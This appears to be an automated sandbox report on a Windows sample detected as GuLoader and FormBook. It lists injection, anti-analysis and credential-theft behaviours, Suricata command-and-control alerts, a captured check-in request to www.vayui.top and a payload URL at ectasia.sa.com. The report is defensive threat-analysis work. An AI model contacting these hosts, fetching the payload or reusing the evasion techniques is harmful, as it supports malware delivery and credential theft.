Edit tour

Windows Analysis Report
ZAMOWIEN.BAT.exe

Overview

General Information

Sample name:	ZAMOWIEN.BAT.exe
Analysis ID:	1566409
MD5:	2dbe82e3bc304a5b59b1b7c080464f60
SHA1:	1db6b6aee8dc85204b14b73a526cddec8a59b700
SHA256:	11c06f789150adb1484d8f5919399c11be0c4fbc04af20847d4dcb83cb648f02
Tags:	exeGuLoaderuser-zxczxc
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

Yara detected GuLoader

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

ZAMOWIEN.BAT.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe" MD5: 2DBE82E3BC304A5B59B1B7C080464F60)

ZAMOWIEN.BAT.exe (PID: 8036 cmdline: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe" MD5: 2DBE82E3BC304A5B59B1B7C080464F60)

iIQnSvahHYwDQ.exe (PID: 744 cmdline: "C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

sdchange.exe (PID: 5016 cmdline: "C:\Windows\SysWOW64\sdchange.exe" MD5: 8E93B557363D8400A8B9F2D70AEB222B)

iIQnSvahHYwDQ.exe (PID: 3448 cmdline: "C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7252 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2456986862.00000000324B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2885632879.0000000004E10000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.2885196470.0000000000920000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2885664510.0000000004E60000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2457299942.0000000035D10000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2885603414.0000000005530000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2063039037.0000000004F1D000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Click to see the 3 entries

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T07:10:28.387140+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49803	195.110.124.133	80	TCP
2024-12-02T07:10:53.421938+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49865	172.67.145.234	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T07:09:45.075605+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	103.83.194.50	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T07:10:45.307145+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49844	172.67.145.234	80	TCP
2024-12-02T07:10:47.946576+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49850	172.67.145.234	80	TCP
2024-12-02T07:10:50.711038+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49856	172.67.145.234	80	TCP

HTTP traffic detected: POST /4twy/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-usHost: www.vayui.topOrigin: http://www.vayui.topReferer: http://www.vayui.top/4twy/Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 204Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0Data Raw: 57 50 6a 78 32 30 4d 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 78 39 72 38 66 73 62 6d 7a 32 4f 38 69 4d 43 57 46 50 57 4d 78 43 6a 49 6e 6b 36 6d 67 66 6a 48 6c 72 69 50 6d 41 63 33 58 34 73 55 46 69 39 69 48 79 79 67 79 72 4f 45 48 2f 54 4f 58 43 45 4c 41 34 2b 2f 4f 64 58 46 48 64 49 39 6a 53 79 6f 45 79 35 38 62 35 77 75 31 54 57 6d 2f 45 71 53 37 49 4b 63 69 72 54 35 66 57 49 33 75 66 4a 47 4a 43 61 54 39 59 31 6e 68 73 35 6a 46 6f 51 57 34 65 6e 6e 68 62 63 7a 6f 4e 4f 37 78 69 64 6b 73 6e 4e 35 54 48 59 48 68 58 6d 30 4a 39 35 46 73 55 50 67 57 45 45 6d 71 6c 6d 4f 56 49 72 31 64 71 4d 43 32 51 3d 3d Data Ascii: WPjx20M=rDqkmhD2LOnTx9r8fsbmz2O8iMCWFPWMxCjInk6mgfjHlriPmAc3X4sUFi9iHyygyrOEH/TOXCELA4+/OdXFHdI9jSyoEy58b5wu1TWm/EqS7IKcirT5fWI3ufJGJCaT9Y1nhs5jFoQW4ennhbczoNO7xidksnN5THYHhXm0J95FsUPgWEEmqlmOVIr1dqMC2Q==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 06:10:28 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 6c 67 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 06:10:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fbDtQFdH5vqzgzxEqH9Up%2BQph0L4%2FNCHYnHPeq6fKeK9wVHQR%2FbZ0K3I5uPKJL3eveHE8KTU0TMnW8K3kZ5%2BjT1VOo287VtkcncTTqJ7KwOxQrPQgma7ZwJj2RmpzNDv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eb927d74c620f60-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1486&rtt_var=743&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=711&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 06:10:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oEIWy2cbIzmxwlo7Ub5u%2FFjh%2BfUS0lr3QbBfQVKN2LmUOD8bwtfkJMCD3JoWp6W%2FscuaPV8Ted2jeQ17w0UTbuGHRReF%2FGHRgoHRtrZnSisO0kYmCsOvgM4JI1r9TVH9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eb927e7be114294-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1713&rtt_var=856&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=731&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 06:10:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Amd3muBhw0lr9yOsgIVTXOd6piF8IyWGGgVEoLmlLM5KfSLUidfU2x%2FqlRRk7%2BhyS81Zdb54wpulQSueONeSOFQMCnRQ2a6ZiA80maXAnQtN8eE%2F9B9xUM0sdOP2QMUB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eb927f8ed518c42-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1982&rtt_var=991&sent=7&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10813&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 06:10:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ptIhjyLo636hqVzj9NRO5lXvHSLk1Gz1HFNam%2BQiz8zfRogeGEXpgyXO2LRPWVQQ8h06MfE9wCqhm4yerlS%2BEEBo2PHiY1ilEFxIeL1%2BbOY28lnJaRBAtcnB5RnqAeR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eb92809fbed42da-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1574&rtt_var=787&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=460&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Source: ZAMOWIEN.BAT.exe, 00000004.00000002.2427146107.0000000002859000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ectasia.sa.com/po.bin
Source: ZAMOWIEN.BAT.exe, 00000004.00000002.2427146107.0000000002848000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ectasia.sa.com/po.binL
Source: ZAMOWIEN.BAT.exe, 00000004.00000002.2427146107.0000000002859000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ectasia.sa.com/po.binca
Source: ZAMOWIEN.BAT.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.0000000000649000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: iIQnSvahHYwDQ.exe, 00000008.00000002.2885196470.00000000009AD000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.vayui.top
Source: iIQnSvahHYwDQ.exe, 00000008.00000002.2885196470.00000000009AD000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.vayui.top/4twy/
Source: ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.00000000005F2000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.00000000005F2000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.0000000000649000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: sdchange.exe, 00000006.00000002.2884931299.0000000003387000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sdchange.exe, 00000006.00000002.2884931299.0000000003387000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sdchange.exe, 00000006.00000002.2884931299.0000000003387000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sdchange.exe, 00000006.00000002.2884931299.0000000003387000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: sdchange.exe, 00000006.00000002.2884931299.0000000003387000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sdchange.exe, 00000006.00000003.2615598045.0000000008201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2456986862.00000000324B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2885632879.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2885196470.0000000000920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2885664510.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2457299942.0000000035D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2885603414.0000000005530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328335C0 NtCreateMutant,LdrInitializeThunk,	4_2_328335C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832B60 NtClose,LdrInitializeThunk,	4_2_32832B60
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_32832C70
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_32832DF0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32833090 NtSetValueKey,	4_2_32833090
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32833010 NtOpenDirectoryObject,	4_2_32833010
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328339B0 NtGetContextThread,	4_2_328339B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32833D10 NtOpenProcessToken,	4_2_32833D10
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32833D70 NtOpenThread,	4_2_32833D70
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32834340 NtSetContextThread,	4_2_32834340
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32834650 NtSuspendThread,	4_2_32834650
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832AB0 NtWaitForSingleObject,	4_2_32832AB0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832AD0 NtReadFile,	4_2_32832AD0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832AF0 NtWriteFile,	4_2_32832AF0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832B80 NtQueryInformationFile,	4_2_32832B80
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832BA0 NtEnumerateValueKey,	4_2_32832BA0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832BE0 NtQueryValueKey,	4_2_32832BE0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832BF0 NtAllocateVirtualMemory,	4_2_32832BF0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832E80 NtReadVirtualMemory,	4_2_32832E80
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832EA0 NtAdjustPrivilegesToken,	4_2_32832EA0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832EE0 NtQueueApcThread,	4_2_32832EE0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832E30 NtWriteVirtualMemory,	4_2_32832E30
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832F90 NtProtectVirtualMemory,	4_2_32832F90
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832FA0 NtQuerySection,	4_2_32832FA0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832FB0 NtResumeThread,	4_2_32832FB0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832FE0 NtCreateFile,	4_2_32832FE0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832F30 NtCreateSection,	4_2_32832F30
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832F60 NtCreateProcessEx,	4_2_32832F60
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832CA0 NtQueryInformationToken,	4_2_32832CA0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832CC0 NtQueryVirtualMemory,	4_2_32832CC0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832CF0 NtOpenProcess,	4_2_32832CF0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832C00 NtQueryInformationProcess,	4_2_32832C00
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832C60 NtCreateKey,	4_2_32832C60
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832DB0 NtEnumerateKey,	4_2_32832DB0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832DD0 NtDelayExecution,	4_2_32832DD0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832D00 NtSetInformationFile,	4_2_32832D00
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832D10 NtMapViewOfSection,	4_2_32832D10
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32832D30 NtUnmapViewOfSection,	4_2_32832D30
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF4650 NtSuspendThread,LdrInitializeThunk,	6_2_04FF4650
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF4340 NtSetContextThread,LdrInitializeThunk,	6_2_04FF4340
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_04FF2CA0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_04FF2C70
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2C60 NtCreateKey,LdrInitializeThunk,	6_2_04FF2C60
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_04FF2DF0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2DD0 NtDelayExecution,LdrInitializeThunk,	6_2_04FF2DD0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_04FF2D30
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_04FF2D10
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_04FF2EE0
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_04FF2E80
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FF2FE0 NtCreateFile,LdrInitializeThunk,	6_2_04FF2FE0
